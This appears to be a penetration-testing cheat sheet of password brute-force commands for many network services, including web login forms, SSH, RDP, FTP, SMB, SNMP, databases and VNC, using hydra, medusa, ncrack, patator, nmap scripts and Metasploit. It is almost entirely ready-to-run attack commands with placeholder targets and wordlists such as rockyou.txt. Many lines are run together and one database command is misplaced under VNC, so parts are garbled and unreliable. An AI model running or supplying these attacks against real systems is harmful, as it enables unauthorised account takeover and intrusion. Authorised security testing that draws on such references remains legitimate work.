Brute-force service password
Web
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l adminLogins
Use Burp suite.
Intecept a login attempt.
Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.
Select your payload, your wordlist.
Click attack.
Look for response-length that differs from the rest.
HTTP Generic Brute
HTTP Basic Auth
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10HTTP - Post Form
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -VHTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.comHydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /adminSSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://$iphydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip sshhydra -v -V -u -L users.txt -p "" -t 1 -u $ip sshhydra -l root -P wordlist.txt $ip sshhydra -L userlist.txt -P best1050.txt $ip -s 22 ssh -Vhydra -l root -P passwords.txt [-t 32] <IP> sshncrack -p 22 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M sshSNMP
hydra -P wordlist.txt -v $ip snmpnmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmpRemote Desktop Protocol
ncrack -vv --user admin -P password-file.txt rdp://$ipncrack -vv --user <User> -P pwds.txt rdp://<IP>hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ipAFP
nmap -p 548 --script afp-brute <IP>AJP
nmap --script ajp-brute -p 8009 <IP>Cassandra Apache
nmap --script cassandra-brute -p 9160 <IP>CouchDB
msf> use auxiliary/scanner/couchdb/couchdb_loginFTP
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftpIMAP
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>IRC
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>ISCSI
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>LDAP
nmap --script ldap-brute -p 389 <IP>hydra -L users.txt -P passwords.txt $ip ldap2 -V -fMongo
nmap -sV --script mongodb-brute -n -p 27017 <IP>MySQL
hydra -L usernames.txt -P pass.txt <IP> mysqlOracleSQL
pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txtnmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
john hashes.txtPOP3
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -Vhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -VPostgreSQL
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgresmedusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgresncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txtnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>PPTP
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>Redis
nmap --script redis-brute -p 6379 <IP>
hydra –P /path/pass.txt <IP> redisRexec
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -VRlogin
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -VRsh
hydra -L <Username_list> rsh://<Victim_IP> -v -Vhttp://pentestmonkey.net/tools/misc/rsh-grind
Rsync
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>RTSP
hydra -l root -P passwords.txt <IP> rtspSMB
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1Telnet
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnetVNC
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>Tpatator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_loginnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>SMTP
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -VLast updated